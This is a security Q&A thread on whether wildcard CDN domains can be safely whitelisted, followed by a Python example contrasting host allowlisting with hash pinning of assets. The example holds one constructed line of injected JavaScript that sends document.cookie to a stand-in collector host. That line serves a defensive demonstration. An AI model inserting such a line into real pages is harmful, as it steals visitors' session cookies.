
I am trying to whitelist URLs for my PC but I want to eventually roll out the rules to my small company's firewall.

But I'm having trouble with CDNs since a page may load content from many distinct URLs.

Do CDNs do any content filtering that would allow me to trust general CDN URLs (for example *.cloudfront.net), or should this generally be avoided and rules created on a per-page basis?

Cheers!

JuanKB1024
  • I do not know what you really expect when mentioning "content filtering", but CDNs are comparable to any other hosting company: they are not aimed at filtering or altering their customers' content. In case of a legal issue, someone can get in touch with the CDN as he would with a hosting company, but I do not imagine that the CDN would take the initiative to alter or filter their customers' data in any way without their approval or without allowing enough time for the customer to handle the issue himself. They are a Content Delivery Network, not an application firewall... – WhiteWinterWolf Apr 28 '15 at 16:03
  • What I meant by "content filtering" was whether they by any measure flag any file as malicious, such as a jquery.js file that's been tampered with to include some keylogger or some 0-day browser exploit. – JuanKB1024 Apr 28 '15 at 18:39
  • @JuanKB1024 CDNs are no less safe from malicious people intentionally using these services to deliver malware - if I had money to burn, I could sign up and make them serve my evil jquery.js, and it'll be out there doing damage until someone actually complains about it, so no, files hosted on CDNs don't magically become malware-free. –  Apr 29 '15 at 06:27
  • Actually, it happens more and more often that I see some "borderline" website showing a CDN error page saying the backend site is not reachable. This does not mean in any way that the CDN filters anything; on the contrary, I merely have the impression that more and more groups are using CDNs to hide the real location of their servers... – WhiteWinterWolf Apr 29 '15 at 09:43
  • Thanks Andre and WWW. I guess the answer is no then. For my purposes, whitelisting every sub alias of a CDN is overkill so I guess I'll leave it as it is. – JuanKB1024 Apr 29 '15 at 19:01

1 Answer


I note that you've gotten your answer from the comments, but I will chime in and create a proper answer to this question.

A CDN works just like a regular hosting company. You pay for disk space, and the CDN makes sure the content you upload is available to you, and often distributed around the globe for faster access. Anyone who has the cash can register and upload their files to a CDN. Some even accept payment in Bitcoin, making it much less risky to upload malicious files.

CDNs rarely do any content filtering, and I would guess that very few do any proactive screening of the files uploaded. How should the CDN know if the uploaded file is malicious? One man's JavaScript may not differ too much from that of another, but one of them could be used with malicious intent while the other one just provides a slider for a blog. It's impossible to know for sure!

If you ever experience malware hosted on a CDN, you could send them an email to have it removed/flagged (like MaxCDN does). But there is no guarantee that CDN X will remove it, and if they do, it might even be too late!

You could make a whitelist of well-known CDNs that you know take quick action regarding hosted malware, and that might protect you a little (and it's certainly better than nothing!). But this is no guarantee, and I would suggest adding additional software/hardware to protect against malicious intent, and not just a whitelist.

Mrtn
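The two points made in this thread (a wildcard rule such as *.cloudfront.net admits every tenant of the CDN, including an attacker's distribution, and whitelisting a host says nothing about the bytes it serves) can be seen concretely in the added example below. It is not code from the question or the answer above; the hostnames, the allowlist, the stand-in jquery.js contents and the tampered copy are all constructed for illustration, and the hash-pinning check is the practitioner's usual complement to a host whitelist rather than anything the thread itself prescribes.

```python
"""Added example (not from the original thread): host allowlisting versus
content verification for CDN-served assets.

All hostnames, rules and file contents below are constructed for the example.
"""
import fnmatch
import hashlib
import hmac

# Constructed allowlist in the style the question describes: one wildcard
# "trust the whole CDN" rule plus per-page exact hostnames.
ALLOWLIST = [
    "*.cloudfront.net",   # wildcard CDN rule
    "code.jquery.com",    # per-page exact rule
    "www.example.com",    # hypothetical company site
]


def host_allowed(host: str, rules=ALLOWLIST) -> bool:
    """Case-insensitive match of a hostname against firewall-style rules.

    A leading '*.' matches any number of subdomain labels (fnmatch's '*'
    also matches dots), which is how most wildcard firewall rules behave.
    The bare apex (e.g. 'cloudfront.net') does not match '*.cloudfront.net'.
    """
    host = host.lower().rstrip(".")
    for rule in rules:
        rule = rule.lower()
        if rule.startswith("*."):
            if fnmatch.fnmatchcase(host, rule):
                return True
        elif host == rule:
            return True
    return False


# Constructed stand-in for a vetted copy of jquery.js; PINNED_SHA256 plays the
# role of the digest you recorded when you reviewed that file.
GOOD_JS = b"/*! constructed stand-in for jquery.js */ window.$ = function () {};\n"
PINNED_SHA256 = hashlib.sha256(GOOD_JS).hexdigest()

# Same file with a constructed cookie-stealer appended: the kind of tampering
# the question worries about. Served from an allowed host, it would pass a
# host-only whitelist unchanged.
TAMPERED_JS = GOOD_JS + b"new Image().src='https://collector.invalid/?c='+document.cookie;\n"


def asset_integrity_ok(content: bytes, expected_sha256_hex: str) -> bool:
    """Verify fetched bytes against a pinned SHA-256 digest.

    Trusting the host says nothing about the content; comparing the digest
    does. compare_digest avoids leaking the mismatch position via timing.
    """
    digest = hashlib.sha256(content).hexdigest()
    return hmac.compare_digest(digest, expected_sha256_hex)


def evaluate(host: str, content: bytes, pinned_sha256_hex: str) -> dict:
    """Combine both checks into one verdict for a single fetched asset."""
    return {
        "host_allowed": host_allowed(host),
        "content_ok": asset_integrity_ok(content, pinned_sha256_hex),
    }


if __name__ == "__main__":
    # Both a legitimate and an attacker-controlled distribution match the
    # wildcard rule; only the hash tells the good file from the tampered one.
    for host, body in [
        ("d111111abcdef8.cloudfront.net", GOOD_JS),      # constructed "our" distribution
        ("d222222evil.cloudfront.net", TAMPERED_JS),     # constructed attacker distribution
        ("cdn.not-on-the-list.example", GOOD_JS),
    ]:
        print(host, evaluate(host, body, PINNED_SHA256))
```

The host check alone returns the same answer for the legitimate and the attacker-controlled *.cloudfront.net names, which is the "you would be whitelisting every tenant" problem from the comments; per-page exact rules narrow that, and a pinned digest of each third-party asset is what actually catches the tampered jquery.js the question asks about.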